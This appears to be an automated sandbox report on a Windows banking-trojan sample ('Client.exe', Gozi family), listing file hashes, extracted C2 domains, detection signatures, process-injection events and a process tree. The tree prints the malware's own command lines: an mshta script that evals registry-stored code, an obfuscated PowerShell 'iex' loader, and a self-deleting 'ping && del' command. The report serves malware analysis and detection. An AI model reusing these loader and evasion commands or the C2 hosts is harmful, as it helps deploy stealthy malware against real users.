Analysis
-
max time kernel
151s -
max time network
161s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20230915-en locale:en-us os:windows10-2004-x64 system -
submitted
11-10-2023 08:56
Static task
static1
Behavioral task
behavioral1
Sample
Client.exe
Resource
win7-20230831-en
General
-
Target
Client.exe
-
Size
422KB
-
MD5
c788f8e7a2d0311297bd198ca9d05ec8
-
SHA1
64240992ba99ae27b0bb4fe277a95524a4b139db
-
SHA256
bf237f642cd049be1e0be68de0f3bd6ed97be7d05059fb2825f94fd0a5afebfd
-
SHA512
2295c28aa11e3c1ea09f0ba790ea1e8322b3c996f4f27bf0aec9edf0997329ea8d13b98417e856f7bd922f4a0d9ef786117b8354a04b752d53e6b53733db4f5d
-
SSDEEP
6144:eH0vsBFRMXdX0tn7qnmUVR9g0pHii2B8mG+R2FLxgwExgw:eH0v4FRyX0tnWnN9pHiN4+R2NxEx
Malware Config
Extracted
gozi
Extracted
gozi
5050
netsecurez.com
whofoxy.com
mimemoa.com
ntcgo.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
fotexion.com
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Dave packer 1 IoCs
Detects executable using a packer named 'Dave' by the community, based on a string at the end.
Processes:
resource: behavioral2/memory/3292-0-0x0000000001560000-0x000000000156C000-memory.dmp
yara_rule: dave
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exe
description: Key value queried
ioc: \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation
process: mshta.exe
-
Suspicious use of SetThreadContext 8 IoCs
Processes:
powershell.exe, Explorer.EXE, cmd.exe
PID 2252 set thread context of 3160 (powershell.exe -> Explorer.EXE)
PID 3160 set thread context of 3720 (Explorer.EXE -> RuntimeBroker.exe)
PID 3160 set thread context of 4064 (Explorer.EXE -> RuntimeBroker.exe)
PID 3160 set thread context of 1692 (Explorer.EXE -> cmd.exe)
PID 3160 set thread context of 2000 (Explorer.EXE -> RuntimeBroker.exe)
PID 3160 set thread context of 2948 (Explorer.EXE -> RuntimeBroker.exe)
PID 1692 set thread context of 2932 (cmd.exe -> PING.EXE)
PID 3160 set thread context of 3184 (Explorer.EXE -> cmd.exe)
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXE (pid 2932)
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Client.exe (pid 3292), powershell.exe (pid 2252), Explorer.EXE (pid 3160)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXE (pid 3160)
-
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
powershell.exe (pid 2252), Explorer.EXE (pid 3160), cmd.exe (pid 1692)
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exe, Explorer.EXE
Token: SeDebugPrivilege (pid 2252, powershell.exe)
Token: SeShutdownPrivilege (pid 3160, Explorer.EXE)
Token: SeCreatePagefilePrivilege (pid 3160, Explorer.EXE)
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXE (pid 3160)
-
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXE (pid 3160)
-
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
mshta.exe, powershell.exe, csc.exe, csc.exe, Explorer.EXE, cmd.exe
PID 4660 wrote to memory of 2252 (mshta.exe -> powershell.exe)
PID 2252 wrote to memory of 4852 (powershell.exe -> csc.exe)
PID 4852 wrote to memory of 2728 (csc.exe -> cvtres.exe)
PID 2252 wrote to memory of 2632 (powershell.exe -> csc.exe)
PID 2632 wrote to memory of 4608 (csc.exe -> cvtres.exe)
PID 2252 wrote to memory of 3160 (powershell.exe -> Explorer.EXE)
PID 3160 wrote to memory of 3720 (Explorer.EXE -> RuntimeBroker.exe)
PID 3160 wrote to memory of 1692 (Explorer.EXE -> cmd.exe)
PID 3160 wrote to memory of 4064 (Explorer.EXE -> RuntimeBroker.exe)
PID 3160 wrote to memory of 2000 (Explorer.EXE -> RuntimeBroker.exe)
PID 3160 wrote to memory of 2948 (Explorer.EXE -> RuntimeBroker.exe)
PID 1692 wrote to memory of 2932 (cmd.exe -> PING.EXE)
PID 3160 wrote to memory of 3184 (Explorer.EXE -> cmd.exe)
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Pono='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pono).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\79A35AC8-8476-1390-56BD-F8F7EA41AC1B\\\CharControl'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sasspqrts -value gp; new-alias -name qndrfqnodu -value iex; qndrfqnodu ([System.Text.Encoding]::ASCII.GetString((sasspqrts "HKCU:Software\AppDataLow\Software\Microsoft\79A35AC8-8476-1390-56BD-F8F7EA41AC1B").TimeAbout))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\leta0m15\leta0m15.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5B4A.tmp" "c:\Users\Admin\AppData\Local\Temp\leta0m15\CSCA338201AE52B40748DD7B34F92235A1B.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ixanufpf\ixanufpf.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5C25.tmp" "c:\Users\Admin\AppData\Local\Temp\ixanufpf\CSCEDBC93B74E10466EA17D921E4764D5B.TMP"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\Client.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads